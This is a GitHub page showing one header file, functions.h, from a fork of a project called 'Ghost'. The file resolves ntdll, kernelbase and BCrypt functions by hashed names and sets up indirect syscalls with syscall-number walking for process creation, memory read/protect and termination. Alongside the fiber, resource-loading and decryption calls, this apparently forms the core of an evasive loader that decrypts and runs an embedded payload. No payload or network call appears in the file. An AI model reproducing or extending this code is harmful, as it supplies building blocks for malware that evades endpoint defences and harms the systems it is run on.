forked from cpu0x00/Ghost
-
Notifications
You must be signed in to change notification settings - Fork 0
/
functions.h
68 lines (48 loc) · 3.36 KB
/
functions.h
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
#pragma once
#include "resolvers.h"
#include "types.h"
HMODULE hNT = GetLoadedDllHandleH(776560387);
HMODULE hBcrypt = LoadLibraryW(L"Bcrypt.dll");
HMODULE hkb = GetLoadedDllHandleH(3314415166);
/* ntdll */
fNtWriteVirtualMemory NtWriteVirtualMemory = reinterpret_cast<fNtWriteVirtualMemory>(GetFunctionAddressH(hNT, 3966201525));
fNtAllocateVirtualMemory NtAllocateVirtualMemory = reinterpret_cast<fNtAllocateVirtualMemory>(GetFunctionAddressH(hNT, 3794193594));
fNtProtectVirtualMemory NtProtectVirtualMemory = reinterpret_cast<fNtProtectVirtualMemory>(GetFunctionAddressH(hNT, 3375077829));
fNtReadVirtualMemory NtReadVirtualMemory = reinterpret_cast<fNtReadVirtualMemory>(GetFunctionAddressH(hNT, 809892425));
fRtlInitUnicodeString RtlInitUnicodeString = reinterpret_cast<fRtlInitUnicodeString>(GetFunctionAddressH(hNT, 3384575400));
fRtlCreateProcessParametersEx RtlCreateProcessParametersEx = reinterpret_cast<fRtlCreateProcessParametersEx>(GetFunctionAddressH(hNT, 3996204138));
fnNtWaitForSingleObject NtWaitForSingleObject = (fnNtWaitForSingleObject)GetFunctionAddressH(hNT, 3052521384);
fNtCreateEvent NtCreateEvent = (fNtCreateEvent)GetFunctionAddressH(hNT, 2283725253);
/* kernelbase */
fnConvertThreadToFiber e_ConvertThreadToFiber = (fnConvertThreadToFiber)GetFunctionAddressH(hkb, 695607944);
fnCreateFiber e_CreateFiber = (fnCreateFiber)GetFunctionAddressH(hkb, 267739959);
fnSwitchToFiber e_SwitchToFiber = (fnSwitchToFiber)GetFunctionAddressH(hkb, 3567794878);
fnFindResourceW e_FindResourceW = (fnFindResourceW)GetFunctionAddressH(hkb, 3756652973);
fnLoadResource e_LoadResource = (fnLoadResource)GetFunctionAddressH(hkb, 3201064692);
fnLockResource e_LockResource = (fnLockResource)GetFunctionAddressH(hkb, 1095194177);
fnSizeofResource e_SizeofResource = (fnSizeofResource)GetFunctionAddressH(hkb, 2048804358);
/* Bcrypt */
fnBCryptOpenAlgorithmProvider e_BCryptOpenAlgorithmProvider = (fnBCryptOpenAlgorithmProvider)GetFunctionAddressH(hBcrypt, 4221130483);
fnBCryptGetProperty e_BCryptGetProperty = (fnBCryptGetProperty)GetFunctionAddressH(hBcrypt, 2942278670);
fnBCryptSetProperty e_BCryptSetProperty = (fnBCryptSetProperty)GetFunctionAddressH(hBcrypt, 3154873802);
fnBCryptGenerateSymmetricKey e_BCryptGenerateSymmetricKey = (fnBCryptGenerateSymmetricKey)GetFunctionAddressH(hBcrypt, 310260467);
fnBCryptDecrypt e_BCryptDecrypt = (fnBCryptDecrypt)GetFunctionAddressH(hBcrypt, 1772972920);
fnBCryptDestroyKey e_BCryptDestroyKey = (fnBCryptDestroyKey)GetFunctionAddressH(hBcrypt, 3493811731);
fnBCryptCloseAlgorithmProvider e_BCryptCloseAlgorithmProvider = (fnBCryptCloseAlgorithmProvider)GetFunctionAddressH(hBcrypt, 4284280008);
/* syscalls */
extern "C" {
// SSN Variables
DWORD dwNtCreateUserProccess = 0;
DWORD dwNtReadVirtualMemory = 0;
DWORD dwNtProtectVirtualMemory = 0;
DWORD dwNtTerminateProcess = 0;
// SYSCALL Variables
UINT_PTR sysCallNtCreateProcess = 0;
UINT_PTR sysCallNtRead = 0;
UINT_PTR sysCallNtProtect = 0;
UINT_PTR sysCallNtTerminate = 0;
};
PVOID s = GetSysCallByWalking(2050401239, &dwNtCreateUserProccess, &sysCallNtCreateProcess);
PVOID h = GetSysCallByWalking(809892425, &dwNtReadVirtualMemory, &sysCallNtRead);
PVOID i = GetSysCallByWalking(3375077829, &dwNtProtectVirtualMemory, &sysCallNtProtect);
PVOID t = GetSysCallByWalking(2224556388, &dwNtTerminateProcess, &sysCallNtTerminate);